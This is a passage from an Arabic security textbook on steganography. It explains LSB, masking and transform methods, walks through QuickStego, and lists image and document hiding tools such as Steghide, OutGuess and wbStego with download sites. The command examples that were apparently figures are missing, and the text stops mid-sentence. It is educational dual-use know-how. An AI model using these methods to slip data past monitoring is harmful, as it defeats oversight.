‫اﻟﺧﺎﺻﺔ ﺑك ﺑﻛل ﺳﮭوﻟﺔ‪.‬‬
‫ﻧﻔﺗرض أﻧك ﻗد اﺧﺗرت ﺻورة ‪ 24‬ﺑت ﻹﺧﻔﺎء اﻟﺑﯾﺎﻧﺎت اﻟﺳرﯾﺔ اﻟﺧﺎﺻﺔ ﺑك‪ ،‬واﻟﺗﻲ ﯾﻣﻛن ان ﺗﻛون ﻣﻣﺛﻠﺔ ﻓﻲ ﺷﻛل رﻗﻣﻲ ﻋﻠﻰ اﻟﻧﺣو اﻟﺗﺎﻟﻲ‪:‬‬
‫)‪(00100111 11101001 11001000) (00100111 11001000 11101001) (11001000 00100111 11101001‬‬
‫وﺗرﯾد إﺧﻔﺎء ﺣرف "‪ "H‬ﻓﻲ اﻟﺻورة أﻋﻼه ‪ 24‬ﺑت ﻛﻣﺎ ﯾﻠﻲ‪.‬‬
‫اﻵن ﺣرف "‪ "H‬ﯾﻣﺛﻠﮫ اﻷرﻗﺎم اﻟﺛﻧﺎﺋﯾﺔ ‪ 01001000‬ﻹﺧﻔﺎء ھذا "‪ ،"H‬ﯾﻣﻛﻧك ﺗﻐﯾر اﻟﺗﯾﺎر اﻟﺳﺎﺑﻖ إﻟﻰ اﻻﺗﻲ‪:‬‬

‫ﺣﯾث إﻧك ﻓﻘط ﺳوف ﺗﺣﺗﺎج اﻟﻰ اﺳﺗﺑدال ‪ LSB‬ﻣن ﻛل ﺑﻛﺳل ﻣن ﻣﻠف اﻟﺻورة ﻛﻣﺎ ھو ﻣﺑﯾن ﻓﻲ ھذا اﻟﺷﻛل‪.‬‬
‫ﻻﺳﺗرداد ھذا ‪ H‬ﻓﻲ اﻟﺟﺎﻧب اﻵﺧر‪ ،‬ﻓﺈن اﻟﺷﺧص ﻓﻲ اﻟﺟﺎﻧب اﻟﻣﺗﻠﻘﻲ ﯾﻘوم ﺑﺗﺟﻣﯾﻊ ﻛل ‪ LSB‬ﺑت ﻣن ﻣﻠف اﻟﺻورة وﺑﺎﻟﺗﺎﻟﻲ ﻓﮭو ﻗﺎدر ﻋﻠﻰ‬
‫اﻟﻛﺷف ﻋن ‪ H‬ﻓﻲ اﻟﺟﺎﻧب اﻟﻣﺗﻠﻘﻲ‪.‬‬
‫‪Masking and Filtering -2‬‬
‫‪ Masking and filtering techniques‬ﺗﺳﺗﻔﯾد ﻣن اﻟﻘدرات اﻟﺑﺻرﯾﺔ ﻟﻺﻧﺳﺎن اﻟﺗﻲ ﻻ ﯾﻣﻛﻧﮭﺎ اﻟﻛﺷف ﻋن اﻟﺗﻐﯾﯾرات اﻟطﻔﯾﻔﺔ ﻓﻲ ﺻوره‬
‫ﻣﻌﯾﻧﺔ‪ .‬ﯾﻣﻛن ﻟﻠﺻور اﻟرﻣﺎدﯾﺔ )‪ (Grayscale images‬إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﺑطرﯾﻘﺔ ﻣﺷﺎﺑﮭﺔ ﻟﻠﻌﻼﻣﺎت اﻟﻣﺎﺋﯾﺔ ﻋﻠﻰ اﻟورق‪ ،‬وﺗﺳﺗﺧدم ﻓﻲ ﺑﻌض‬
‫اﻷﺣﯾﺎن ﻛﺄﻧﮭﺎ ﻋﻼﻣﺎت ﻣﺎﺋﯾﺔ رﻗﻣﯾﺔ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪466‬‬

‫‪ The masking technique‬ﯾﺳﻣﺢ ﻟك ﺑﺈﺧﻔﺎء اﻟﺑﯾﺎﻧﺎت اﻟﺳرﯾﺔ اﻟﺧﺎﺻﺔ ﺑك ﻋن طرﯾﻖ وﺿﻌﮭﺎ ﻓﻲ ﻣﻠف اﻟﺻور‪ .‬ﻛل ﻣن ﺗﻘﻧﯾﺎت‬
‫‪) Masking‬اﻟﺗﻘﻧﻊ( و‪ filtering‬ﺗﺳﺗﺧدم ﻓﻲ اﻟﻐﺎﻟب ﻓﻲ ‪-24‬ﺑت‪-‬ﻟﻛل‪-‬ﺑﻛﺳل ﻓﻲ اﻟﺻور واﻟﺻور اﻟرﻣﺎدﯾﺔ‪ .‬ﻹﺧﻔﺎء اﻟرﺳﺎﺋل اﻟﺳرﯾﺔ‪ ،‬ﻓﺎﻧت‬
‫ﺑﺣﺎﺟﺔ اﻟﻰ ﺿﺑط اﻹﺿﺎءة واﻟﺗﻌﺗﯾم ﻟﻠﺻورة‪ .‬إذا ﻛﺎن اﻟﺗﻐﯾﯾر ﻓﻲ اﻹﻧﺎرة ﺻﻐﯾر‪ ،‬ﻓﺎن اﻟﻣﺳﺗﺧدﻣﯾن ﻋدا اﻟﻣﺳﺗﺧدﻣﯾن اﻟﻣﺳﺗﮭدﻓﯾن ﻻ ﯾﻼﺣظون أن‬
‫اﻟﺻورة ﺗﺣﺗوي ﻋﻠﻰ رﺳﺎﻟﺔ ﺧﻔﯾﺔ‪ .‬ھذا اﻷﺳﻠوب ﯾﻣﻛن ﺑﺳﮭوﻟﺔ ﺗطﺑﯾﻘﮭﺎ ﻋﻠﻰ اﻟﺻورة ﻛﻣﺎ أﻧﮭﺎ ﻻ ﺗﺧل ﺑﺎﻟﺻورة‪ .‬ﺗﺳﺗﺧدم ﻓﻲ اﻟﻐﺎﻟب ﻣﻊ ﺻور‬
‫‪) Lossy JPEG .JPEG‬اﻟﺟزء اﻟﻣﮭﻣل ﻓﻲ اﻟﺻورة( ﺗﻛون ﻣﺣﺻﻧﺔ ﻧﺳﺑﯾﺎ ﻣن ﻋﻣﻠﯾﺎت اﻟزرع واﻟﺿﻐط ﻋﻠﻰ اﻟﺻور‪ .‬وﺑﺎﻟﺗﺎﻟﻲ‪ ،‬ﻓﺎن إﺧﻔﺎء‬
‫اﻟﻣﻌﻠوﻣﺎت ﻓﻲ اﻟﺟزء ‪ Lossy jpeg‬ﯾﺗم ﻏﺎﻟﺑﺎ ﺑﺎﺳﺗﺧدام ﺗﻘﻧﯾﺔ اﻟﺗﻘﻧﻊ )‪ .(Masking technique‬اﻟﺳﺑب ﻓﻲ ذﻟك ان ‪Steganography Image‬‬
‫ﯾﻘوم ﺑﺎﻟﺗﺷﻔﯾر ﺑواﺳطﺔ وﺿﻊ ﻋﻼﻣﺎت ﻓﻲ ﻣﻌدل ﻣﻧﺧﻔض ﻋﻧد ﺿﻐط ‪ JPEG‬واﻟذي ﺗﻛون ﻓﯾﮫ اﻟرﺳﺎﻟﺔ ﻣﺧﺑﺄه ﻓﻲ ﻣﻧطﻘﮫ ﺧﺎﺻﮫ ﻣن اﻟﺻورة‪.‬‬

‫‪Algorithms and Transformation -3‬‬


‫‪ The algorithms and transformation technique‬ﯾﻌﺗﻣد ﻋﻠﻰ إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟﺳرﯾﺔ ﻣن ﺧﻼل ﺿﻐط اﻟﺻورة‪ .‬ﻓﻲ ھذه‬
‫اﻟﺗﻘﻧﯾﺔ‪ ،‬ﯾﺗم إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﻓﻲ اﻟﺻورة ﻣن ﺧﻼل ﺗطﺑﯾﻖ ﺧوارزﻣﯾﺎت اﻟﺿﻐط اﻟﻣﺧﺗﻠﻔﺔ ووظﺎﺋف اﻟﺗﺣول)‪. (Transformation function‬‬
‫ﺧوارزﻣﯾﺔ اﻟﺿﻐط واﻟﺗﺣول ﯾﺳﺗﺧدم داﻟﺔ رﯾﺎﺿﯾﺔ ﻹﺧﻔﺎء ﻣﻌﺎﻣل أﻗل ﻗﻠﯾﻼ أﺛﻧﺎء ﺿﻐط اﻟﺻور‪ .‬ﻋﻣوﻣﺎ اﻟﺻور ‪ JPEG‬ھﻲ ﻣﻧﺎﺳﺑﺔ ﻷداء‬
‫ﻋﻣﻠﯾﺔ اﻟﺿﻐط ﻛﻣﺎ ﯾﻣﻛن ﺣﻔظﮭﺎ ﻓﻲ ﻣﺳﺗوﯾﺎت ﺿﻐط ﻣﺧﺗﻠﻔﺔ‪ .‬ھذا اﻷﺳﻠوب ﯾوﻓر ﻟك ﻣﺳﺗوى ﻋﺎل ﻣن إﺧﻔﺎء اﻟﺑﯾﺎﻧﺎت اﻟﺳرﯾﺔ‪ .‬ﺻور ‪JPEG‬‬
‫ﺗﺳﺗﺧدم ‪ cosine‬ﻣﻧﻔﺻﻠﺔ ﻟﺗﺣﻘﯾﻖ ﻋﻣﻠﯾﺔ اﻟﺿﻐط‪.‬‬
‫ھﻧﺎك ﺛﻼﺛﺔ أﻧواع ﻣن ﺗﻘﻧﯾﺎت اﻟﺗﺣول اﻟﻣﺳﺗﺧدﻣﺔ ﻓﻲ ﺧوارزﻣﯾﺔ ﺿﻐط‪:‬‬
‫‪Fast Fourier transformation -‬‬
‫‪Discrete cosine transformation -‬‬
‫‪Wavelet transformation -‬‬
‫‪Image Steganography: Quickstego‬‬

‫اﻟﻣﺻدر‪http://quickcrypto.com :‬‬
‫‪Quickstego‬ﯾﺗﯾﺢ ﻟك اﺧﻔﺎء اﻟرﺳﺎﺋل اﻟﺳرﯾﺔ ﻓﻲ اﻟﺻور ﺑﺣﯾث ﯾﻣﻛن ﻓﻘط ﻟﻣﺳﺗﺧدﻣﻲ‪ Quickstego‬ﻣن اﺳﺗرداد وﻗراءة اﻟرﺳﺎﺋل اﻟﺳرﯾﺔ‬
‫اﻟﻣﺧﻔﯾﺔ‪ .‬ﺑﻣﺟرد إﺧﻔﺎء اﻟرﺳﺎﻟﺔ اﻟﺳرﯾﺔ ﻓﻲ اﻟﺻورة‪ ،‬ﻻ ﯾزال ﺑﺈﻣﻛﺎﻧك ﺣﻔظﮫ ﻛﻣﻠف اﻟﺻورة؛ ﻓﺈﻧﮫ ﺳﯾﺗم ﺗﺣﻣﯾل ﺗﻣﺎﻣﺎ ﻣﺛل أي ﺻورة أﺧرى‪،‬‬
‫وﯾﺑدو ﻛﻣﺎ ﻓﻌﻠت ﻣن ﻗﺑل‪ .‬ﯾﻣﻛن ﺣﻔظ اﻟﺻورة‪ ،‬ﻋﺑر اﻟﺑرﯾد اﻻﻟﻛﺗروﻧﻲ‪ ،‬وﺗﺣﻣﯾﻠﮭﺎ ﻋﻠﻰ ﺷﺑﻛﺔ اﻹﻧﺗرﻧت ﻛﻣﺎ ﻛﺎن ﻣن ﻗﺑل‪ ،‬واﻟﻔرق اﻟوﺣﯾد‬
‫ﺳﯾﻛون أﻧﮫ ﯾﺣﺗوي ﻋﻠﻰ رﺳﺎﻟﺔ ﺧﻔﯾﺔ‪.‬‬
‫‪ Quickstego‬ﯾﻐﯾر ﺑﺻورة ﺗدرﯾﺟﯾﺔ ﺑﻛﺳل )ﻋﻧﺎﺻر اﻟﺻورة اﻟﻔردﯾﺔ( ﻣن اﻟﺻورة‪ ،‬ﺗﺷﻔﯾر اﻟﻧص اﻟﺳري ﺑﺈﺿﺎﻓﺔ اﺧﺗﻼﻓﺎت ﺻﻐﯾرة ﻓﻲ ﻟون‬
‫اﻟﺻورة‪ .‬ﻓﻲ اﻟﻣﻣﺎرﺳﺔ اﻟﻌﻣﻠﯾﺔ‪ ،‬ﺑﺎﻟﻧﺳﺑﺔ ﻟﻠﻌﯾن اﻟﺑﺷرﯾﺔ‪ ،‬ﻻ ﺗظﮭر ھذه اﻟﺧﻼﻓﺎت اﻟﺻﻐﯾرة ﻟﺗﻐﯾﯾر اﻟﺻورة‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪467‬‬

‫طرﯾﻘﺔ اﻟﻌﻣل‪:‬‬
‫‪ -‬ﻧﻘوم ﺑﺎﻟﺗﺛﺑﯾت ﻣن ﺧﻼل اﺗﺑﺎع ‪ Wizard‬ﺛم ﻧﻘوم ﺑﺗﺷﻐﯾل اﻟﺑرﻧﺎﻣﺞ ﻣن ﺧﻼل اﻟﻧﻘر اﻟﻣزدوج ﻓوﻗﮫ واﻟﺗﻲ ﺗؤدى اﻟﻰ ظﮭور اﻻﺗﻲ‪:‬‬

‫ﻧﺟد اﻧﮫ ﯾﺣﺗوي ﻋﻠﻰ ﻣﺟﻣوع ﻣن اﻷدوات ﻧﻘوم أوﻻ ﺑﺎﻟﻧﻘر ﻓوق ‪ Open Image‬ﻟﻧﻘوم ﻣن ﺧﻼل اﺧﺗﯾﺎر اﻟﺻورة اﻟﺗﻲ ﺳوف‬ ‫‪-‬‬
‫ﻧﺳﺗﺧدﻣﮭﺎ ﻛﻐطﺎء ﻹﺧﻔﺎء اﻟﻧص اﻟﺳري‪.‬‬
‫ﻧﻼﺣظ ﺑﻌد اﺧﺗﯾﺎر اﻟﺻورة‪ ،‬إذا ﻛﺎﻧت اﻟﺻورة ﺧﺎﻟﯾﮫ ﻣن أي ﻧص ﻣﺷﻔر ﺑواﺳطﺔ ھذا اﻟﺗطﺑﯾﻖ ﻓﮭذا ﺳوف ﯾؤدى اﻟﻰ ظﮭور اﻟرﺳﺎﻟﺔ‬ ‫‪-‬‬
‫اﻟﺗﺎﻟﯾﺔ ﻓﻲ أﺳﻔل ادوات اﺧﺗﯾﺎر اﻟﺻورة‪:‬‬
‫‪THIS IMAGE DOES NOT HAVE A QUICK STEGO SECRET TEXT MESSAGE.‬‬
‫ﺑﻌد اﺧﺗﯾﺎر اﻟﺻورة ﻧﻘوم ﺑﺎﻟﻧﻘر ﻓوق ‪ Open Text‬ﻻﺧﺗﯾﺎر اﻟﻧص اﻟذي ﻧرﯾد اﺧﻔﺎءه‪.‬‬ ‫‪-‬‬
‫اﻻن وﻗد اﺧﺗرﻧﺎ اﻟﺻور وأﯾﺿﺎ اﻟﻧص اﻟذي ﻧرﯾد اﺧﻔﺎﺋﮫ‪ ،‬ﻧﻘوم اﻻن ﺑﺎﻟﻧﻘر ﻓوق ‪ Hide Text‬واﻟذي ﯾﻘوم ﺑﺈﺧﻔﺎء اﻟﻧص ﺑداﺧل‬ ‫‪-‬‬
‫اﻟﺻورة‪.‬‬
‫ﻧﻼﺣظ أﯾﺿﺎ ﺑﺟﺎﻧب اﻟزر ‪ Hide Text‬وﺟود زر اﺧر وھو ‪ Get Text‬واﻟذي ﯾﻘوم ﺑﺄداء اﻟﻌﻛس ﺣﯾث ﯾﻘوم ﺑﺎﻟﺣﺻول ﻋﻠﻰ اﻟﻧص‬ ‫‪-‬‬
‫اﻟﻣﺧﻔﻲ ﻣن اﻟﺻورة‪.‬‬
‫ﺑﻌد إﺗﻣﺎم إﺧﻔﺎء اﻟﻧص ﻓﻲ اﻟﺻورة ﺗظﮭر اﻟرﺳﺎﻟﺔ )‪ (The text message is now hidden in image‬واﻟﺗﻲ ﺗﺧﺑرك ﺑﺈﻧﮭﺎء‬ ‫‪-‬‬
‫ﻋﻣﻠﯾﺔ اﻻﺧﻔﺎء‪.‬‬
‫اﻻن اﻟﻰ اﻟﺧطوة اﻷﺧﯾرة وﻓﯾﮭﺎ ﻧﻘوم ﺑﺣﻔظ اﻟﺻورة اﻟﺗﻲ ﺗﺣﺗوي ﻋﻠﻰ اﻟﻧص اﻟﻣﺷﻔر وذﻟك ﺑﺎﻟﻧﻘر ﻓوق ‪.Save Image‬‬ ‫‪-‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪468‬‬

‫‪Image Steganography Tools‬‬


‫ﻣﺛل اﻷداة ‪ Quickstego‬اﻟﺗﻲ ﻧﺎﻗﺷﻧﮭﺎ ﺳﺎﺑﻘﺎ‪ ،‬ﯾﻣﻛﻧك أﯾﺿﺎ اﺳﺗﺧدام أدوات إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﺑداﺧل اﻟﺻور اﻟﺗﺎﻟﯾﺔ ﻹﺧﻔﺎء اﻟرﺳﺎﺋل اﻟﺳرﯾﺔ‬
‫اﻟﺧﺎﺻﺔ ﺑك ﻓﻲ اﻟﺻور‪:‬‬
‫‪Hide in Picture available at http://sourceforge.net‬‬
‫‪CryptaPix available at http://www.briggsoft.com‬‬
‫‪BMPSecrets available at http://bmpsecrets.com‬‬
‫‪OpenPuff available at http://embeddedsw.net‬‬
‫‪Openstego available at http://openstego.sourceforge.net‬‬
‫‪PHP-Class Streamsteganography available at http://www.phpclasses.org‬‬
‫‪Red JPEG available at http://www.totalcmd.net‬‬
‫‪Steganography Studio available at http://stegstudio.sourceforge.net‬‬
‫‪Virtual Steganographic Laboratory (VSL) available at http://vsl.sourceforge.net‬‬
‫‪Image Steganography Tools for Linux‬‬
‫‪Steghide -1‬‬
‫اﻟﻣﺻدر‪http://steghide.sourceforge.net/download.php :‬‬
‫‪ Steghide‬ھو ﺑرﻧﺎﻣﺞ ﺳطر اﻷواﻣر ﻹﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟﺗﻲ ھﻲ ﻗﺎدرة ﻋﻠﻰ إﺧﻔﺎء اﻟﺑﯾﺎﻧﺎت ﻓﻲ أﻧواع ﻣﺧﺗﻠﻔﺔ ﻣن ﺻورة واﻟﻣﻠﻔﺎت اﻟﺻوﺗﯾﺔ‪.‬‬
‫ﻻ ﯾﺗم ﺗﻐﯾﯾر اﻟﺗرددات وﻻ اﻻﻟوان ﻋﻠﻰ اﻟﺗواﻟﻲ ﻣﻣﺎ ﯾﺟﻌل اﻟﺗﺿﻣﯾن ﺿد اﻻﺧﺗﺑﺎرات اﻹﺣﺻﺎﺋﯾﺔ‪.‬‬
‫ﻟﺗﺿﻣﯾن اﻟﻧص ﻓﻲ اﻟﺻورة ﻛﺎﻻﺗﻰ‪:‬‬

‫ﻹﺧراج اﻟﻧص ﻣن اﻟﺻورة ﻛﺎﻻﺗﻰ‪:‬‬

‫‪Steg -2‬‬
‫اﻟﻣﺻدر‪https://steg.drupalgardens.com/stegdownload :‬‬
‫‪ Steg‬ھو ﻣﻧﺻﺔ ﺑرﻣﺟﯾﺎت ﻣﺣﻣوﻟﺔ‪ ،‬ﻛﺗب ﻓﻲ‪ . C + +‬ﺗﺳﺗﺧدم ﺗﻘﻧﯾﺎت إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت واﻟﺗﺷﻔﯾر ﻹﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت داﺧل اﻟﺻور ﺳواء اﻟﻐﯾر‬
‫ﻣﺿﻐوطﺔ واﻟﻣﺿﻐوطﺔ وﯾدﻋم اﻟﻌدﯾد ﻣن ﺻﯾﻎ اﻟﺻور)‪ .BMP ،PNG ،TIFF ،JPEG (JPG‬ﻣﻊ ﺳﮭوﻟﺔ واﺟﮭﺔ اﻟﻣﺳﺗﺧدم اﻟرﺳوﻣﯾﺔ ﻓﺎﻧﮫ‬
‫ﻣن اﻟﻣﻣﻛن ﺗﺣدﯾد ﻣﻌﺎﯾر إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت‪ ،‬ﺗﻘﯾﯾم اﻟﺻورة اﺳﺗﺧدام ﻛل ﻣن ﻣﻔﺗﺎح اﻟﺗﺷﻔﯾر اﻟﻣﺗﻣﺎﺛل وﻣﻔﺗﺎح اﻟﺗﺷﻔﯾر اﻟﻐﯾر ﻣﺗﻧﺎظر‪ .‬ﯾﻣﻛن إﺧﻔﺎء‬
‫اﻟﺑﯾﺎﻧﺎت ﻛﺄﻧﮫ ﻣﻠف أرﺷﯾف ﻣﺿﻐوط‪ ،‬وأﻧﮫ ﻣن اﻟﻣﻣﻛن أﯾﺿﺎ أن ﺗﺿﯾف ﺗﻌﻠﯾﻘﺎ‪.‬‬
‫‪ Steg‬ﯾﻌﻣل ﻋﻠﻰ ﺟﻧو ‪ /‬ﻟﯾﻧﻛس‪ ،‬ﻣﺎﯾﻛروﺳوﻓت وﯾﻧدوز وأﺑل ﻣﺎك‪ ، OS X‬وﯾﻣﻛﻧك ﺗﺣﻣﯾل اﻟﺑرﻧﺎﻣﺞ ﻣﺑﺎﺷرة ﻣن اﻟﻣوﻗﻊ اﻟرﺳﻣﻲ‪.‬‬
‫ﺑﻣﺟرد ﺗﺛﺑﯾﺗﮫ ﯾﻣﻛﻧك ﺗﺷﻐﯾﻠﮫ وﺳﺗرى ﺷﯾﺋﺎ ﻣﺷﺎﺑﮭﺎ ﻟﮭذه اﻟﺻورة‪:‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪469‬‬

‫‪OutGuess -3‬‬
‫‪ OutGuess‬ھو أداة ﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ ﻋﺎﻟﻣﯾﺔ واﻟﺗﻲ ﺗﺗﯾﺢ إدﺧﺎل اﻟﻣﻌﻠوﻣﺎت اﻟﻣﺧﻔﯾﺔ ﻓﻲ اﻟﺑت زاﺋدة ﻣن ﻣﺻﺎدر اﻟﺑﯾﺎﻧﺎت‪ .‬طﺑﯾﻌﺔ ﻣﺻدر اﻟﺑﯾﺎﻧﺎت‬
‫ﻻ ﯾﻣت ﺑﺻﻠﺔ اﻟﻰ ﺟوھر ‪ .OutGuess‬ﯾﻌﺗﻣد اﻟﺑرﻧﺎﻣﺞ ﻋﻠﻰ ﻣﻌﺎﻟﺟﺎت ﺑﯾﺎﻧﺎت ﻣﺣددة اﻟﺗﻲ ﻣن ﺷﺄﻧﮭﺎ أن اﺳﺗﺧراج اﻟﺑﺎﯾت اﻟﻔﺎﺋﺿﺔ واﻟﻛﺗﺎﺑﺔ‬
‫ﻋﻠﯾﮭﺎ ﺛم ارﺟﺎﻋﮭﺎ ﻣرة أﺧرى ﺑﻌد اﻟﺗﻌدﯾل‪ .‬ﺣﺎﻟﯾﺎ ﯾدﻋم ‪ PPM‬و‪ PNM‬و‪) JPG‬ﺻﯾﻐﮫ ﺻوره(‪ ،‬أﯾﺿل ‪ OutGuess‬ﯾﻣﻛﻧﮫ اﺳﺗﺧدام أي ﻧوع‬
‫ﻣن اﻟﺑﯾﺎﻧﺎت‪ ،‬طﺎﻟﻣﺎ ﺗم ﺗوﻓﯾر اﻟﻣﻌﺎﻟﺞ‪.‬‬
‫‪ OutGuess‬ﯾﺳﺗﺧدم ‪ generic iterator object‬ﻟﺗﺣدﯾد أي ﻣن ﺑﺗﺎت اﻟﺑﯾﺎﻧﺎت اﻟﺗﻲ ﯾﺟب أن ﯾﺗم ﺗﻌدﯾﻠﮭﺎ‪ .‬و‪ seed‬ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻟﺗﻌدﯾل‬
‫ﺳﻠوك ‪ .iterator‬ﯾﻘوم ﺑﺗﺿﻣﯾن اﻟﺑﯾﺎﻧﺎت ﺟﻧﺑﺎ إﻟﻰ ﺟﻧب ﻣﻊ ﺑﻘﯾﺔ اﻟرﺳﺎﻟﺔ‪ .‬ﻋن طرﯾﻖ ﺗﻐﯾﯾر ‪ OutGuess ،seed‬ﯾﺣﺎل إﯾﺟﺎد ﺗﺳﻠﺳل ﻣن‬
‫اﻟﺑﺗﺎت واﻟذي ﯾﻘﻠل ﻋدد اﻟﺗﻐﯾﯾرات ﻓﻲ اﻟﺑﯾﺎﻧﺎت اﻟﺗﻲ ﯾﺗﻌﯾن اﻟﻘﯾﺎم ﺑﮭﺎ‪.‬‬
‫ﺑﺎﻹﺿﺎﻓﺔ إﻟﻰ ذﻟك‪ OutGuess ،‬ﯾﺳﻣﺢ ﺑﺈﺧﻔﺎء رﺳﺎﻟﺗﯾن ﻓﻲ اﻟﺑﯾﺎﻧﺎت‪ .‬ﯾﺣﺗﻔظ ﺑﺎﻟﺑﺗﺎت اﻟﺗﻲ ﺗم ﺗﻌدﯾﻠﮭﺎ ﻣﺳﺑﻘﺎ وﯾﺣﺻرھﺎ‪.‬‬
‫ﻟﺗﺷﻔﯾر ﻣﺣﺗوى ﻧﺳﺗﺧدم اﻻﺗﻲ‪:‬‬

‫ﯾﻣﻛﻧك أﯾﺿﺎ اﺳﺗﺧدام )‪ (-K‬ﺛم اﻟرﺳﺎﻟﺔ ﺑﯾن ﻋﻼﻣﺗﻲ ﺗﻧﺻﯾص ﻹﺿﺎﻓﺔ رﺳﺎﻟﺔ ﺳرﯾﮫ أﺧرى‪.‬‬
‫ﻟﻔك ﺗﺷﻔﯾر ﻣﺣﺗوى ﻧﺳﺗﺧدم اﻻﺗﻲ‪:‬‬

‫‪Document Steganography‬‬
‫ﻣﺛل طرﯾﻘﺔ إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﺑداﺧل اﻟﺻور‪ ،‬إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﺑداﺧل اﻟوﺛﯾﻘﺔ ھو أﺳﻠوب ﯾﺳﺗﺧدم ﻹﺧﻔﺎء اﻟرﺳﺎﺋل اﻟﺳرﯾﺔ ﻋﻠﻰ أن ﯾﺗم ﺗﺣوﯾﻠﮭﺎ‬
‫ﻓﻲ اﻟوﺛﺎﺋﻖ‪ .‬ﯾوﺿﺢ اﻟرﺳم اﻟﺑﯾﺎﻧﻲ اﻟﺗﺎﻟﻲ ﻋﻣﻠﯾﺔ إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﺑداﺧل اﻟوﺛﯾﻘﺔ‪:‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪470‬‬

‫‪Document Steganography: wbstego‬‬

‫اﻟﻣﺻدر‪http://wbstego.wbailer.com :‬‬

‫‪ Wbstego‬ھو أداة إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﻓﻲ ﻣﺳﺗﻧد‪ .‬ﺑﺎﺳﺗﺧدام ھذه اﻷداة‪ ،‬ﯾﻣﻛﻧك إﺧﻔﺎء أي ﻧوع ﻣن اﻟﻣﻠﻔﺎت ﺿﻣن أﻧواع اﻟﻣﻠﻔﺎت اﻟﻧﺎﻗﻠﺔ ﻣﺛل‬
‫‪ Windows bitmaps‬ﻣﻊ اﻷﻟوان ‪ 16‬و‪ 256‬و ‪ ،16.7m‬اﻟﻣﻠﻔﺎت اﻟﻧﺻﯾﺔ ﻣن اﻟﻧوع ‪ASCII‬أو ‪ ANSI‬وﺣﻘول ‪ HTML‬وﻣﻠﻔﺎت‬
‫‪.Adobe PDF‬‬

‫‪Document Steganography Tools‬‬


‫ﻣﺛل اﻷداة ‪ ،wbstego‬ﻓﮭﻧﺎك اﻟﻌدﯾد ﻣن اﻷدوات اﻷﺧرى اﻟﺗﻲ ﺗﺳﻣﺢ ﻟك ﺑﺈﺧﻔﺎء اﻟﺑﯾﺎﻧﺎت داﺧل ﻣﻠﻔﺎت اﻟوﺛﺎﺋﻖ اﻷﺧرى ﻣﻊ اﻷﻧواع اﻟﻣﺧﺗﻠﻔﺔ أو‬
‫اﻻﻣﺗدادات اﻟﻣﺧﺗﻠﻔﺔ‪:‬‬
‫‪Merge Streams available at http://www.ntkernel.com‬‬
‫‪Office XML available at http://www.irongeek.com‬‬
‫‪Data Stash available at http://www.skyjuicesoftware.com‬‬
‫‪FoxHole available at http://foxhole.sourceforge.net‬‬
‫‪Xidie Security Suite available at http://www.stegano.net‬‬
‫‪Hydan available at http://www.crazyboy.com‬‬
‫‪Stegl available at http://stegj.sourceforge.net‬‬
‫‪Stegostick available at http://sourceforge.net‬‬

‫‪Video Steganography‬‬

‫‪ Video steganography‬ﯾﻧطوي ﻋﻠﻰ إﺧﻔﺎء رﺳﺎﺋل اﻟﻣﻠﻔﺎت اﻟﺳرﯾﺔ ﻣﻊ أي ﻣن اﻣﺗدادات ﻣﻠف اﻟﻔﯾدﯾو اﻟﻣﺗدﻓﻘﺔ ﺑﺎﺳﺗﻣرار‪ .‬ﯾﺗم اﺳﺗﺧدام‬
‫ﻣﻠﻔﺎت اﻟﻔﯾدﯾو ھﻧﺎ ﺑﺎﻋﺗﺑﺎرھﺎ اﻟﻧﺎﻗل ﻟﺗﺣﻣل اﻟﻣﻌﻠوﻣﺎت اﻟﺳرﯾﺔ‪ .‬ﻓﺈﻧﮫ ﯾﺣﺗﻔظ ﺑﺎﻟﻣﻌﻠوﻣﺎت اﻟﺳرﯾﺔ اﻟﺧﺎﺻﺔ ﺑك أﻛﺛر أﻣﻧﺎ‪ .‬ﻣﻠﻔﺎت اﻟﻔﯾدﯾو اﻟﻧﺎﻗﻠﺔ ھو‬
‫ﻋﺑﺎره ﻋن ﺗﯾﺎر ﻣﺗﺣرك ﻣن اﻟﺻور واﻟﺻوت‪ ،‬ﻓﺈﻧﮫ ﻣن اﻟﺻﻌب ﻟﻠﻣﺗﻠﻘﻲ ﻏﯾر اﻟﻣﻘﺻودة ﻣﻼﺣظﺔ اﻟﺗﺷوﯾش ﻓﻲ ﻣﻠف اﻟﻔﯾدﯾو اﻟﻧﺎﺟﻣﺔ ﺑﺳﺑب‬
‫اﻟرﺳﺎﻟﺔ اﻟﺳرﯾﺔ‪ .‬ﺣﯾث أﻧﮫ ﯾﻛون ﺑدون ﻣراﻗﺑﺔ ﺑﺳﺑب اﺳﺗﻣرار ﺗدﻓﻖ اﻟﻔﯾدﯾو‪ .‬ﻣﻠف ﻓﯾدﯾو ھو ﻣزﯾﺞ ﻣن اﻟﺻورة واﻟﺻوت‪ ،‬وﺟﻣﯾﻊ اﻟﺗﻘﻧﯾﺎت‬
